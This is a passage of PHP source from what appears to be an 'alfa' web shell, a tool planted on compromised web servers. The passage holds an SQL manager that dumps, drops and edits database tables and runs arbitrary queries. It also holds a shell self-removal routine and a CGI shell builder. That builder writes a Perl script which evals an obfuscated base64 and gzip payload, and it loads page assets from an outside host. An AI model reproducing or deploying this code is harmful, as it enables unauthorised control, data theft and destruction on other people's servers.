            $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
            if ($connection_db && !empty($_POST['sql_base'])) {
                $form_visibility = "none";
            }
        }
        $database_list = array();
        echo "\r\n<div class='header' style='min-height:300px;'>" . ($form_visibility != "none" ? "<center><div class='txtfont_header'>| Sql Manager |</div><p>" . getConfigHtml('all') . "</p></center><div style='text-align:center;margin-bottom: 10px;'><button class='connection-his-btn db-opt-id' onclick='alfaShowConnectionHistory(this);' mode='on'>Connection History</button><div class='connection_history_holder'></div></div>" : "") . "\r\n<div class='sf' class='db-opt-id'><table style='margin: 0 auto;" . ($form_visibility == "none" ? "display:none;" : "") . "' cellpadding='2' cellspacing='0'><tr>\r\n<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>\r\n<td><select name='type'><option value='mysql' selected>mysql</option></select></td>\r\n<td><input type='text' name='sql_host' id='db_host' value='" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "'></td>\r\n<td><input type='text' name='sql_login' id='db_user' value='" . (empty($_POST['sql_login']) ? '' : htmlspecialchars($_POST['sql_login'])) . "'></td>\r\n<td><input type='text' name='sql_pass' id='db_pw' value='" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "'></td><td>";
        $tmp = "<input type='text' name='sql_base' id='db_name' value='" . (empty($_POST['sql_base']) ? '' : htmlspecialchars($_POST['sql_base'])) . "'>";
        if (isset($_POST['sql_host'])) {
            if ($connection_db) {
                $db->setCharset('utf8');
                $db->listDbs();
                echo "<select name=sql_base><option value=''></option>";
                while ($item = $db->fetch()) {
                    list($key, $value) = each($item);
                    $database_list[] = $value;
                    echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
                }
                echo "</select>";
            } else {
                echo $tmp;
            }
        } else {
            echo $tmp;
        }
        $curr_mysql_id = $_POST['current_mysql_id'];
        echo "</td>\r\n<td><button onclick='fs(this);return false;' class='db-opt-id db-connect-btn'>Connect</button></td>\r\n<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>\r\n</tr>\r\n</table>";
        if ($db->mysqli_connect_error) {
            echo '<div style="text-align: center;font-size: 17px;margin-top: 18px;">' . $db->mysqli_connect_error_msg . '</div>';
        }
        if (!empty($curr_mysql_id)) {
            $sql_title_db = "";
            if (!empty($_POST['sql_base'])) {
                $sql_title_db = "d.querySelector('#tab_" . $curr_mysql_id . " span').innerHTML='" . addslashes($_POST['sql_base']) . "';";
            }
            echo "<script>mysql_cache['" . $curr_mysql_id . "']['host']='" . addslashes($_POST['sql_host']) . "';mysql_cache['" . $curr_mysql_id . "']['user']='" . addslashes($_POST['sql_login']) . "';mysql_cache['" . $curr_mysql_id . "']['pass']='" . addslashes($_POST['sql_pass']) . "';mysql_cache['" . $curr_mysql_id . "']['db']='" . addslashes($_POST['sql_base']) . "';mysql_cache['" . $curr_mysql_id . "']['charset']='" . addslashes($_POST['charset']) . "';mysql_cache['" . $curr_mysql_id . "']['type']='" . addslashes($_POST['type']) . "';mysql_cache['" . $curr_mysql_id . "']['count']='" . addslashes($_POST['sql_count']) . "';" . $sql_title_db . "alfaConnectionHistoryUpdate();</script>";
        }
        if (isset($db) && $db->link) {
            if (!empty($_POST['sql_base'])) {
                echo "<div class='mysql-main'><div mode='block' onclick='alfaMysqlTablePanelCtl(this);' class='tables-panel-ctl db-opt-id'>&#x3C;&#x3C;</div><div class='mysql-tables'><div><input placeholder=\"Filter Table\" style='padding: 0;margin-left: 11px;text-align:center;' type='text' name='filter_all'><button class='db-opt-id' onclick='alfaMysqlFilterAllTable(this);return false;'>Search</button></div><div class='block'><a sql_count='" . (empty($_POST['sql_count']) ? "false" : "true") . "' mode='closed' onclick='alfaMysqlFilterAllTable(this,true);' class='expander parent-expander db-opt-id' href='javascript:void(0);'><img src='http://solevisible.com/icons/menu/b_plus.png' title='Expand/Collapse All DataBases' alt='Expand/Collapse All DataBases'></a></div><ul style='margin-top: 28px;'>";
                foreach ($database_list as $db_name) {
                    echo '<li><div class="block"><i></i><b></b><a sql_count="' . (empty($_POST['sql_count']) ? "false" : "true") . '" db_target="' . $db_name . '" onclick="alfaMysqlExpander(this);" class="expander cls-' . $db_name . '-expander db-opt-id" href="javascript:void(0);"><img src="http://solevisible.com/icons/menu/' . ($db_name == $_POST['sql_base'] ? "b_minus.png" : "b_plus.png") . '" title="Expand/Collapse" alt="Expand/Collapse"></a></div><span class="db_name">' . $db_name . '</span><div class="clearfloat"></div><div db_name="' . $db_name . '" mode="' . ($db_name == $_POST['sql_base'] ? "loaded" : "no") . '" class="list_container cls-' . $db_name . '"><div>';
                    if ($db_name == $_POST['sql_base']) {
                        $db->selectdb($_POST['sql_base']);
                        $tbls_res = $db->listTables();
                        echo '<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" target=".cls-' . $db_name . '" placeholder="Filter Table" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';
                        while ($item = $db->fetch($tbls_res)) {
                            list($key, $value) = each($item);
                            if (!empty($_POST['sql_count'])) {
                                $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `' . $value . '`'));
                            }
                            $value = htmlspecialchars($value);
                            echo "<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a class='db-opt-id' db_target='" . $db_name . "' href='javascript:void(0);' onclick=\"alfaLoadTableData(this,'" . $value . "')\"><span class='mysql_tables' style='font-weight:unset;'>" . $value . "</span></a>" . (empty($_POST['sql_count']) ? '&nbsp;' : " <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</div></li>";
                        }
                        echo '</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" class="db-opt-id" target=".cls-' . $db_name . '" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" target=".cls-' . $db_name . '" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" class="db-opt-id" db_target="' . $db_name . '" target=".cls-' . $db_name . '" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>';
                    }
                    echo "</div></li>";
                }
                echo "</ul></div><div class='mysql-query-results'><div class='mysql-query-result-tabs'><div class='db-opt-id mysql-query-selected-tab' target='.mysql-query-result-content' onclick='alfaMysqlTabCtl(this);'>Result</div><div class='db-opt-id' target='.mysql-query-form' onclick='alfaMysqlTabCtl(this);'>Query</div><div class='db-opt-id' target='.mysql-search-area' onclick='alfaMysqlTabCtl(this);'>Search</div><div class='db-opt-id' target='.mysql-structure' onclick='alfaMysqlTabCtl(this);'>Structure</div><div class='db-opt-id' target='.mysql-insert-row' onclick='alfaMysqlTabCtl(this);'>Insert</div><div style='display:none;' class='db-opt-id' target='.mysql-edit-row' onclick='alfaMysqlTabCtl(this);'>Edit</div></div><div class='mysql-query-content mysql-insert-row mysql-hide-content'></div><div class='mysql-query-content mysql-edit-row mysql-hide-content'></div><div class='mysql-query-content mysql-search-area mysql-hide-content'></div><div class='mysql-query-content mysql-structure mysql-hide-content'></div><div class='mysql-query-content mysql-query-form mysql-hide-content'><div style='margin-bottom: 5px;'><span>Query:</span></div><textarea name='query' style='width:90%;height:100px'></textarea><p><div style='float:left;margin-left: 30px;'><input class='button db-opt-id' db_target='" . $_POST['sql_base'] . "' onclick='alfaMysqlQuery(this);return false;' type='submit' value=' '></div></p></div><div class='mysql-query-content mysql-query-result-content'><div class='mysql-query-result-header'><div style='margin-bottom: 10px;' class='mysql-query-reporter'></div><div class='mysql-query-pager'></div></div><div class='mysql-query-table'></div></div></form></td></tr>";
            }
            echo "</table></div>";
            echo "</div>";
        } else {
            echo htmlspecialchars($db->error());
        }
        echo "</div>";
        alfafooter();
    }
    function alfaSql_manager_api()
    {
        $db = $_POST["alfa1"];
        $type = $_POST["alfa2"];
        $sql_count = $_POST["alfa3"] == "true" ? true : false;
        $db = @json_decode($db, true);
        $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);
        @mysqli_set_charset($conn, "utf8");
        if ($conn) {
            if ($type == "load_all_tables") {
                $tables = array();
                $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('" . implode("','", $db["databases"]) . "');");
                $count = 0;
                while ($row = @mysqli_fetch_assoc($q_tables)) {
                    if ($sql_count) {
                        $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `' . $row["table_schema"] . '`.`' . $row["table_name"] . '`');
                        if ($count_q) {
                            $count = @mysqli_fetch_row($count_q);
                            $count = $count[0];
                        }
                    }
                    $tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int) $count);
                }
                foreach ($db["databases"] as $db) {
                    if (!isset($tables[$db])) {
                        $tables[$db] = null;
                    }
                }
                echo @json_encode($tables);
            } elseif ($type == "dump_drop") {
                if ($db["mode"] == "drop") {
                    foreach ($db["tables"] as $table) {
                        @mysqli_query($conn, "DROP TABLE `" . $table . "`;");
                    }
                    $tables = array();
                    $q_tables = @mysqli_query($conn, "SHOW TABLES;");
                    $count = 0;
                    while ($row = @mysqli_fetch_array($q_tables)) {
                        if ($sql_count) {
                            $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `' . $row[0] . '`');
                            if ($count_q) {
                                $count = @mysqli_fetch_row($count_q);
                                $count = $count[0];
                            }
                        }
                        $tables[] = array("name" => $row[0], "count" => (int) $count);
                    }
                    echo @json_encode($tables);
                } else {
                    if (strlen(alfaEx("mysqldump")) > 0) {
                        alfaEx("mysqldump --single-transaction --host=\"" . $db["host"] . "\" --user=\"" . $db["user"] . "\" --password=\"" . $db["pass"] . "\" " . $db["db"] . " " . implode(" ", $db["tables"]) . "  > " . $db["dump_file"]);
                    } else {
                        $fp = @fopen($db["dump_file"], "w");
                        foreach ($db["tables"] as $table) {
                            $res = @mysqli_query($conn, 'SHOW CREATE TABLE `' . $table . '`');
                            $create = @mysqli_fetch_array($res);
                            $sql = "DROP TABLE IF EXISTS `" . $table . "`;\n" . $create[1] . ";\n";
                            if ($fp) {
                                fwrite($fp, $sql);
                            } else {
                                echo $sql;
                            }
                            $tbl_data = @mysqli_query($conn, 'SELECT * FROM `' . $table . '`');
                            $head = true;
                            while ($item = @mysqli_fetch_assoc($tbl_data)) {
                                $columns = array();
                                foreach ($item as $k => $v) {
                                    if ($v == null) {
                                        $item[$k] = "''";
                                    } elseif (is_numeric($v)) {
                                        $item[$k] = $v;
                                    } else {
                                        $item[$k] = "'" . @mysqli_real_escape_string($conn, $v) . "'";
                                    }
                                    $columns[] = "`" . $k . "`";
                                }
                                if ($head) {
                                    $sql = 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
                                    $head = false;
                                } else {
                                    $sql = "\n\t,(" . implode(", ", $item) . ')';
                                }
                                if ($fp) {
                                    fwrite($fp, $sql);
                                } else {
                                    echo $sql;
                                }
                            }
                            if (!$head) {
                                if ($fp) {
                                    fwrite($fp, ";\n\n");
                                } else {
                                    echo ";\n\n";
                                }
                            }
                        }
                    }
                    echo @json_encode(array("status" => true, "file" => $db["dump_file"]));
                }
            } elseif ($type == "load_tables") {
                $tables = array();
                $q_tables = @mysqli_query($conn, "SHOW TABLES;");
                $count = 0;
                while ($row = @mysqli_fetch_array($q_tables)) {
                    if ($sql_count) {
                        $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `' . $row[0] . '`');
                        if ($count_q) {
                            $count = @mysqli_fetch_row($count_q);
                            $count = $count[0];
                        }
                    }
                    $tables[] = array("name" => $row[0], "count" => (int) $count);
                }
                echo @json_encode($tables);
            } elseif ($type == "alter") {
                $db["alter"]["type"] = strtolower($db["alter"]["type"]);
                $inputs = $db["alter"]["type"] . "(" . $db["alter"]["input"] . ")";
                $text_input = array("longtext", "text", "mediumtext", "tinytext");
                if (in_array($db["alter"]["type"], $text_input)) {
                    $inputs = $db["alter"]["type"];
                }
                @mysqli_query($conn, "ALTER TABLE `" . $db["table"] . "` MODIFY COLUMN `" . $db["column"] . "` " . $inputs);
                $error = @mysqli_error($conn);
                if ($error) {
                    echo $error;
                } else {
                    echo "ok";
                }
            } elseif ($type == "edit" || $type == "delete" || $type == "delete_all") {
                if ($type == "edit") {
                    $q = @mysqli_query($conn, "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` = '" . addslashes($db["key"]) . "' LIMIT 0,1");
                    $row = @mysqli_fetch_assoc($q);
                    if ($row) {
                        $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" . $db["db"] . "' AND `TABLE_NAME` = '" . $db["table"] . "'");
                        $columns = array();
                        $edit_data = array();
                        while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) {
                            $input = array("col_type" => $row2["COLUMN_TYPE"]);
                            $row2["type"] = strtolower($row2["type"]);
                            switch ($row2["type"]) {
                                case "longtext":
                                case "text":
                                case "mediumtext":
                                case "tinytext":
                                    $input["tag"] = "textarea";
                                    break;
                                case "int":
                                case "smallint":
                                case "bigint":
                                case "tinyint":
                                case "mediumint":
                                    $input["tag"] = "input";
                                    $input["type"] = "number";
                                    break;
                                default:
                                    $input["tag"] = "input";
                                    $input["type"] = "text";
                            }
                            $columns[$row2["name"]] = $input;
                        }
                        foreach ($row as $key => $v) {
                            $edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), "type" => $columns[$key]);
                        }
                        echo @json_encode($edit_data);
                    }
                } else {
                    if ($type == "delete_all") {
                        $rows = implode("', '", $db["rows"]);
                    } else {
                        $rows = addslashes($db["key"]);
                    }
                    $query = "DELETE FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` IN ('" . $rows . "')";
                    @mysqli_query($conn, $query);
                    $error = @mysqli_error($conn);
                    if ($error) {
                        $status = false;
                    } else {
                        $status = true;
                    }
                    echo @json_encode(array("status" => $status, "error" => $error, "query" => $query));
                }
            } elseif ($type == "update") {
                $query = "UPDATE `" . $db["db"] . "`.`" . $db["table"] . "` SET ";
                foreach ($db["data"] as $col => $val) {
                    $query .= "`" . $col . "` = '" . mysqli_real_escape_string($conn, $val) . "',";
                }
                $query = substr($query, 0, -1);
                $query .= "WHERE `" . $db["col_key"] . "` = '" . $db["key"] . "'";
                $res = @mysqli_query($conn, $query);
                echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
            } elseif ($type == "insert") {
                $query = "INSERT INTO `" . $db["db"] . "`.`" . $db["table"] . "` ";
                foreach ($db["data"] as $col => $val) {
                    $cols .= $col . ",";
                    $vals .= "'" . mysqli_real_escape_string($conn, $val) . "',";
                }
                $cols = substr($cols, 0, -1);
                $vals = substr($vals, 0, -1);
                $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";
                $res = @mysqli_query($conn, $query);
                echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
            } else {
                $pages = 0;
                $title = false;
                $query = "";
                $tbl_content = '<table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
                $line = 0;
                $tables = array();
                $columns = array();
                if ($type == "load_data") {
                    $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT 0,30";
                    $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $db["db"] . "`.`" . $db["table"] . "`");
                    $tbl_count = @mysqli_fetch_row($tbl_count_q);
                    $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" . $db["db"] . "' AND `TABLE_NAME` = '" . $db["table"] . "'");
                    while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) {
                        $columns[] = $row2;
                    }
                    if ($tbl_count[0] > 30) {
                        $pages = ceil($tbl_count[0] / 30);
                    }
                } elseif ($type == "query") {
                    $query = $db["query"];
                } elseif ($type == "page") {
                    $db["page"] = (int) $db["page"] - 1;
                    $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT " . $db["page"] * 30 . ",30";
                } elseif ($type == "search") {
                    $search = "";
                    $search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL");
                    foreach ($db["search"] as $col => $val) {
                        $search_noval_r = in_array($val["opt"], $search_noval);
                        if (empty($val["value"]) && !$search_noval_r) {
                            continue;
                        }
                        if (strstr($val["opt"], "...") || $search_noval_r) {
                            $val["opt"] = str_replace("...", $val["value"], $val["opt"]);
                            $search .= $col . " " . $val["opt"] . " AND ";
                        } else {
                            $search .= $col . " " . $val["opt"] . " '" . addslashes($val["value"]) . "' AND ";
                        }
                    }
                    $search .= "1=1";
                    $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE " . $search;
                }
                $q_tables = @mysqli_query($conn, $query);
                if (!$q_tables) {
                    echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query));
                    return false;
                }
                $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '" . @addslashes($db["db"]) . "' AND TABLE_NAME = '" . @addslashes($db["table"]) . "' AND COLUMN_KEY = 'PRI'");
                if ($col_key) {
                    $col_key = @mysqli_fetch_row($col_key);
                    $col_key = $col_key[0];
                    if (!empty($col_key)) {
                        $tbl_content = '<div style="margin-bottom:5px;margin-top:5px;"><button col_key="' . $col_key . '" tbl_name="' . $db["table"] . '" db_id="' . $db["db_id"] . '" 	db_target="' . $db["db"] . '" onclick="alfaMysqlDeleteAllSelectedrows(this);return false;">Delete Selected Rows</button></div><table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
                    }
                } else {
                    $col_key = false;
                }
                while ($item = @mysqli_fetch_assoc($q_tables)) {
                    if (!$title) {
                        $tbl_content .= '<tr style="background-color:#305b8e;">';
                        if ($col_key) {
                            $tbl_content .= '<th style="width: 55px;text-align:center;"><input db_id="' . $db["db_id"] . '" onchange="alfaMysqlTblSelectAll(this);" type="checkbox"></th><th style="width: 55px;text-align:center;">Edit</th><th style="width: 55px;text-align:center;">Delete</th>';
                        }
                        foreach ($item as $key => $value) {
                            $tbl_content .= '<th>' . $key . '</th>';
                        }
                        reset($item);
                        $title = true;
                        $tbl_content .= '</tr><tr>';
                    }
                    if ($col_key) {
                        $cacheMsg = '<td style="text-align:center;"><input row_id="' . $line . '" type="checkbox" name="tbl_rows_checkbox[]" value="' . $item[$col_key] . '"></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="' . $db["db_id"] . '" db_target="' . $db["db"] . '" tbl_name="' . $db["table"] . '" col_key="' . $col_key . '" key="' . $item[$col_key] . '" onclick="alfaMysqlEditRow(this, \'edit\');" style="color:#0acaa6;">Edit</a></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="' . $db["db_id"] . '" db_target="' . $db["db"] . '" tbl_name="' . $db["table"] . '" col_key="' . $col_key . '" key="' . $item[$col_key] . '" row_id="' . $line . '" onclick="alfaMysqlEditRow(this, \'delete\');" style="color:#ff1e1e;">Delete</a></td>';
                    }
                    $tbl_content .= '<tr class="tbl_row tbl_row_l' . $line . '">' . $cacheMsg;
                    $line++;
                    foreach ($item as $key => $value) {
                        if ($value == null) {
                            $tbl_content .= '<td><i>null</i></td>';
                        } else {
                            $tbl_content .= '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
                        }
                    }
                    $tbl_content .= '</tr>';
                }
                $tbl_content .= '</table>';
                if (!$title) {
                    $tbl_content = "<div style='padding:5px;border:1px dashed;margin:10px;'>Table is empty...</div>";
                }
                echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query));
            }
            @mysqli_close($conn);
        }
    }
    function alfaselfrm()
    {
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'yes') {
            echo __pre() . '<center>';
            if (@unlink($GLOBALS['__file_path'])) {
                echo "<b>Shell has been removed</i> :)</b>";
            } else {
                echo "unlink error!";
            }
            echo "</center>";
        }
        if (isset($_POST['alfa1']) && $_POST['alfa1'] != 'yes') {
            echo "<div class=header>";
            echo "\r\n<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
            echo "<p><div class=\"txtfont\">Do you want to destroy me?!</div><a href=javascript:void(0) onclick=\"g('selfrm',null,'yes');\"> Yes</a>";
            echo "</p></center></div>";
        }
    }
    function alfacgishell()
    {
        alfahead();
        $div = "";
        alfaCreateParentFolder();
        @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
        if (!in_array($_POST['alfa1'], array('perl', 'py'))) {
            $div = "</div>";
            echo "<div class=header><center><p><div class=\"txtfont_header\">| CGI Shell |</div></p><h3><a class=\"rejectme\" href=\"javascript:void(0)\" onclick=\"runcgi('perl')\">| Perl | </a><a class=\"rejectme\" href=\"javascript:void(0)\" onclick=\"runcgi('py');\">| Python | </a>";
        }
        if (isset($_POST['alfa1']) && in_array($_POST['alfa1'], array('perl', 'py'))) {
            @mkdir('cgialfa', 0755);
            @chdir('cgialfa');
            alfacgihtaccess('cgi');
            $name = $_POST['alfa1'] . '.alfa';
            $perl = "#!/usr/bin/perl   -I/usr/local/bandmin\nuse MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64(\"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\")));";
